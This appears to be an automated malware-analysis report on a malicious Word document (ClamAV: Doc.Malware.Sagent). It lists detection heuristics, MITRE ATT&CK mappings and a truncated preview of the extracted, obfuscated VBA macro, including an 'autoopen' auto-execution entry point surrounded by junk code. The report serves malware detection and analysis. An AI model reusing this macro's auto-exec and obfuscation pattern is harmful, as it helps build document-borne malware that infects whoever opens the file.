MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious OLE document containing a legacy WordBasic auto-executing macro named 'autoopen'. This macro utilizes a GetObject call, indicating an attempt to execute a payload. The presence of obfuscated VBA code further suggests malicious intent, likely to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Malware.Sagent-6931999-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6931999-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30536 bytes |
SHA-256: 120506c938897b10c1a5966a3814d4ffdffc43cae6a70881f7659e3c815cdfa6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jAA1B4Gx"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "mAoxDcA"
Attribute VB_Base = "0{99CEE0DB-9565-410A-A315-B2EC9FD8B6D7}{3BB24D2E-7F7F-48E5-892D-843F9F9BEA4A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "zccQAG"
Attribute VB_Base = "0{96F632E8-7CCF-4CD3-A7CF-2B3CE4F4DC71}{5C974C69-93BD-47F7-BF2C-6AD6CB4D79EA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "tAQcAGC"
Function MwCwAZ()
If 132231733 = 538339903 Then
Do While kxA_cZ < zABGUoA
loxQ4Q = Cos(356794433) + 979331288
fDZx_cA = CDate(515139391) + Cos(392143804)
VAD1AGAU = 430379750 + Round(401638555)
Loop
jD_Ukxo = Rnd(737895602)
Set bXAUQC = hAkUA_X
End If
If 278275960 = 226707311 Then
Do While kAADBAkw < O4QGUU
KAADkUAZ = CByte(454023400) + 787133190
OBQUoDCB = Log(541820776) + Log(239011391)
kQADUUAx = 877146738 + Int(350849917)
Loop
iAXAAAZc = CByte(754384999)
Set Bc1UDBk = mCADUGAA
End If
If 654107779 = 893930709 Then
Do While FAUAAAAx < MAXUAUDA
vcGAwxDA = Oct(998611496) + 79376968
XAX1AD = Sin(973966068) + CSng(359513257)
qGA1QDBA = 691085569 + Sin(130574638)
Loop
iUCwZAo = Cos(263607702)
Set cABAGU = RCUAQQc
End If
End Function
Sub autoopen()
IAABcoAA
End Sub
Function JZkDDA()
If 142346240 = 27270177 Then
Do While hXDUAAB < YAAAABA
PAZAw11 = CInt(379839980) + 848615530
CoAUB1AA = Sqr(894407513) + Rnd(82297737)
Y1QQAA = 145372090 + Atn(735089169)
Loop
aCAAAD = Tan(745688683)
Set JZQBBAZ = DUADAcU
End If
If 731689416 = 561202822 Then
Do While jwxkBG4B < zGZkUQD
KGDAAoX = CDate(769570690) + 74635455
S4AAD_AA = Sqr(117432543) + Fix(835652479)
zQCGZG = 87813025 + CDate(14089991)
Loop
dUwDQBQ = Sin(719459528)
Set XBAAA_ = MZAUoA
End If
If 870416164 = 775209818 Then
Do While pAAA_c < z_CxAw
lZAkA_ = Tan(694486308) + 70595562
KUGQ4_C = CLng(712179658) + CDbl(520347273)
wUoAkQA = 282815557 + Int(722703533)
Loop
bAAAADA = Sqr(487365216)
Set PAAQUcx = lAXABw
End If
End Function
Attribute VB_Name = "LUGQADA4"
Function EoABBQ4()
If 829201740 = 54154337 Then
Do While wwAX4Q < MAAU4ZDU
OA4DCU = CDbl(591588611) + 273626962
rAA11UU_ = Round(8547486) + Cos(865046552)
RZBAkwZ = 617399200 + Atn(770341347)
Loop
f1UxxZA = CDbl(402955983)
Set W1QGCAA = RA4o1AAw
End If
If 761644374 = 943734569 Then
Do While zAAGAx < lABAAAD
XGBQoA = CByte(35328566) + 409170261
SDooADQx = CDate(733734919) + CBool(339767733)
FAUDZQk = 649687618 + Cos(300153811)
Loop
YAcAAxBZ = Tan(370050852)
Set oAADGZ_A = owDCAAo
End If
If 627576388 = 718146267 Then
Do While SQAAUBBA < IoQ1QAGA
ToBxBAUA = Tan(512418196) + 309403022
L_kAAQ1A = Atn(442546105) + Hex(101301303)
ZDAA1AA = 568528882 + Int(195880229)
Loop
vox_D_C = Sqr(299365527)
Set EUQDGGA = tAw_AAxA
End If
End Function
Function IAABcoAA()
On Error Resume Next
If 213639972 = 891335028 Then
Do While wQAkAD < TCDxwB
vZoAxA = Rnd(662752901) + 549525863
oAXkZA = Hex(759109034) + Rnd(66956956)
JooAACA = 131032685 + CSng(632887159)
Loop
lxAkQCGB = CSng(255178368)
Set KB4DAAcA = jBkUAA
End If
If 691721
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.